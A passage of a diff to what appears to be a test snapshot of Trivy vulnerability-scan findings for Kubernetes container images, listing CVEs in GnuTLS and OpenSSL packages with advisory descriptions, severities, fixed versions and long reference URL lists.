"https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://security.netapp.com/advisory/ntap-20230324-0005/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://ubuntu.com/security/notices/USN-5901-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0361", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "3.6.7-4+deb10u9", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-4209", + "installedVersion": "3.6.7-4+deb10u5", + "packageName": "libgnutls30", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-4209", + "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", + "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", + "https://gitlab.com/gnutls/gnutls/-/issues/1306", + "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", + "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", + "https://security.netapp.com/advisory/ntap-20220915-0005/", + "https://ubuntu.com/security/notices/USN-5550-1", + "https://ubuntu.com/security/notices/USN-5750-1", + "https://www.cve.org/CVERecord?id=CVE-2021-4209", + ], + }, + "category": "Vulnerability", + "description": "A NULL pointer dereference flaw was found in GnuTLS. As Nettle's hash update functions internally call memcpy, providing zero-length input may cause undefined behavior. This flaw leads to a denial of service after authentication in rare circumstances.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "GnuTLS: Null pointer dereference in MD_UPDATE", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://avd.aquasec.com/nvd/cve-2021-4209", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://access.redhat.com/security/cve/CVE-2021-4209", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1306", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://security.netapp.com/advisory/ntap-20220915-0005/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://ubuntu.com/security/notices/USN-5550-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://ubuntu.com/security/notices/USN-5750-1", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-4209", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3389", + "installedVersion": "3.6.7-4+deb10u5", + "packageName": "libgnutls30", + "references": [ + "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", + "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", + "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", + "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", + "http://curl.haxx.se/docs/adv_20120124B.html", + "http://downloads.asterisk.org/pub/security/AST-2016-001.html", + "http://ekoparty.org/2011/juliano-rizzo.php", + "http://eprint.iacr.org/2004/111", + "http://eprint.iacr.org/2006/136", + "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", + "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", + "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", + "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", + "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", + "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", + "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", + "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", + "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", + "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", + "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", + "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", + "http://marc.info/?l=bugtraq&m=132750579901589&w=2", + "http://marc.info/?l=bugtraq&m=132872385320240&w=2", + "http://marc.info/?l=bugtraq&m=133365109612558&w=2", + "http://marc.info/?l=bugtraq&m=133728004526190&w=2", + "http://marc.info/?l=bugtraq&m=134254866602253&w=2", + "http://marc.info/?l=bugtraq&m=134254957702612&w=2", + "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", + "http://osvdb.org/74829", + "http://rhn.redhat.com/errata/RHSA-2012-0508.html", + "http://rhn.redhat.com/errata/RHSA-2013-1455.html", + "http://secunia.com/advisories/45791", + "http://secunia.com/advisories/47998", + "http://secunia.com/advisories/48256", + "http://secunia.com/advisories/48692", + "http://secunia.com/advisories/48915", + "http://secunia.com/advisories/48948", + "http://secunia.com/advisories/49198", + "http://secunia.com/advisories/55322", + "http://secunia.com/advisories/55350", + "http://secunia.com/advisories/55351", + "http://security.gentoo.org/glsa/glsa-201203-02.xml", + "http://security.gentoo.org/glsa/glsa-201406-32.xml", + "http://support.apple.com/kb/HT4999", + "http://support.apple.com/kb/HT5001", + "http://support.apple.com/kb/HT5130", + "http://support.apple.com/kb/HT5281", + "http://support.apple.com/kb/HT5501", + "http://support.apple.com/kb/HT6150", + "http://technet.microsoft.com/security/advisory/2588513", + "http://vnhacker.blogspot.com/2011/09/beast.html", + "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", + "http://www.debian.org/security/2012/dsa-2398", + "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", + "http://www.ibm.com/developerworks/java/jdk/alerts/", + "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", + "http://www.insecure.cl/Beast-SSL.rar", + "http://www.kb.cert.org/vuls/id/864643", + "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", + "http://www.opera.com/docs/changelogs/mac/1151/", + "http://www.opera.com/docs/changelogs/mac/1160/", + "http://www.opera.com/docs/changelogs/unix/1151/", + "http://www.opera.com/docs/changelogs/unix/1160/", + "http://www.opera.com/docs/changelogs/windows/1151/", + "http://www.opera.com/docs/changelogs/windows/1160/", + "http://www.opera.com/support/kb/view/1004/", + "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", + "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", + "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", + "http://www.redhat.com/support/errata/RHSA-2011-1384.html", + "http://www.redhat.com/support/errata/RHSA-2012-0006.html", + "http://www.securityfocus.com/bid/49388", + "http://www.securityfocus.com/bid/49778", + "http://www.securitytracker.com/id/1029190", + "http://www.securitytracker.com/id?1025997", + "http://www.securitytracker.com/id?1026103", + "http://www.securitytracker.com/id?1026704", + "http://www.ubuntu.com/usn/USN-1263-1", + "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", + "https://access.redhat.com/security/cve/CVE-2011-3389", + "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", + "https://bugzilla.novell.com/show_bug.cgi?id=719047", + "https://bugzilla.redhat.com/show_bug.cgi?id=737506", + "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", + "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", + "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", + "https://hermes.opensuse.org/messages/13154861", + "https://hermes.opensuse.org/messages/13155432", + "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", + "https://linux.oracle.com/cve/CVE-2011-3389.html", + "https://linux.oracle.com/errata/ELSA-2011-1380.html", + "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", + "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", + "https://ubuntu.com/security/notices/USN-1263-1", + "https://www.cve.org/CVERecord?id=CVE-2011-3389", + ], + }, + "category": "Vulnerability", + "description": "The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST)", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://avd.aquasec.com/nvd/cve-2011-3389", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "value": "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "value": "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "value": "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "value": "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", + "value": "http://curl.haxx.se/docs/adv_20120124B.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "http://downloads.asterisk.org/pub/security/AST-2016-001.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "value": "http://ekoparty.org/2011/juliano-rizzo.php", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "value": "http://eprint.iacr.org/2004/111", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + "value": "http://eprint.iacr.org/2006/136", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", + "value": "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-1", + "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-2", + "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "value": "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0286", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2023-0286", - "https://access.redhat.com/security/cve/cve-2023-0286", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", - "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", - "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", - "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", - "https://linux.oracle.com/cve/CVE-2023-0286.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", - "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://ubuntu.com/security/notices/USN-5845-1", - "https://ubuntu.com/security/notices/USN-5845-2", - "https://www.cve.org/CVERecord?id=CVE-2023-0286", - "https://www.openssl.org/news/secadv/20230207.txt", - ], - }, - "category": "Vulnerability", - "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "X.400 address type confusion in X.509 GeneralName", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0286", + "value": "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", + "value": "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0286", + "value": "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2023-0286", + "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "http://marc.info/?l=bugtraq&m=132750579901589&w=2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "http://marc.info/?l=bugtraq&m=132872385320240&w=2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "http://marc.info/?l=bugtraq&m=133365109612558&w=2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "http://marc.info/?l=bugtraq&m=133728004526190&w=2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "http://marc.info/?l=bugtraq&m=134254866602253&w=2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "http://marc.info/?l=bugtraq&m=134254957702612&w=2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "http://osvdb.org/74829", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "http://rhn.redhat.com/errata/RHSA-2012-0508.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "http://rhn.redhat.com/errata/RHSA-2013-1455.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "http://secunia.com/advisories/45791", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "http://secunia.com/advisories/47998", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "http://secunia.com/advisories/48256", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "http://secunia.com/advisories/48692", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "http://secunia.com/advisories/48915", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "http://secunia.com/advisories/48948", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "http://secunia.com/advisories/49198", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "http://secunia.com/advisories/55322", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "http://secunia.com/advisories/55350", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "http://secunia.com/advisories/55351", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "http://security.gentoo.org/glsa/glsa-201203-02.xml", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "http://security.gentoo.org/glsa/glsa-201406-32.xml", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "http://support.apple.com/kb/HT4999", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "http://support.apple.com/kb/HT5001", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "http://support.apple.com/kb/HT5130", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "http://support.apple.com/kb/HT5281", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "http://support.apple.com/kb/HT5501", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "http://support.apple.com/kb/HT6150", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "http://technet.microsoft.com/security/advisory/2588513", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "http://vnhacker.blogspot.com/2011/09/beast.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", }, { "type": "URL", - "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "value": "http://www.debian.org/security/2012/dsa-2398", }, { "type": "URL", - "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "value": "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "value": "http://www.ibm.com/developerworks/java/jdk/alerts/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "value": "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "value": "http://www.insecure.cl/Beast-SSL.rar", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "value": "http://www.kb.cert.org/vuls/id/864643", }, { "type": "URL", - "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "value": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", + "value": "http://www.opera.com/docs/changelogs/mac/1151/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "http://www.opera.com/docs/changelogs/mac/1160/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "value": "http://www.opera.com/docs/changelogs/unix/1151/", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "value": "http://www.opera.com/docs/changelogs/unix/1160/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "http://www.opera.com/docs/changelogs/windows/1151/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-1", + "value": "http://www.opera.com/docs/changelogs/windows/1160/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-2", + "value": "http://www.opera.com/support/kb/view/1004/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "value": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0464", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0464", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0464", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230322.txt", - ], - }, - "category": "Vulnerability", - "description": "A security vulnerability has been identified in all supported versions - -of OpenSSL related to the verification of X.509 certificate chains -that include policy constraints. Attackers may be able to exploit this -vulnerability by creating a malicious certificate chain that triggers -exponential use of computational resources, leading to a denial-of-service -(DoS) attack on affected systems. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0464", + "value": "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0464", + "value": "http://www.redhat.com/support/errata/RHSA-2011-1384.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "value": "http://www.redhat.com/support/errata/RHSA-2012-0006.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "value": "http://www.securityfocus.com/bid/49388", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "value": "http://www.securityfocus.com/bid/49778", }, { "type": "URL", - "value": 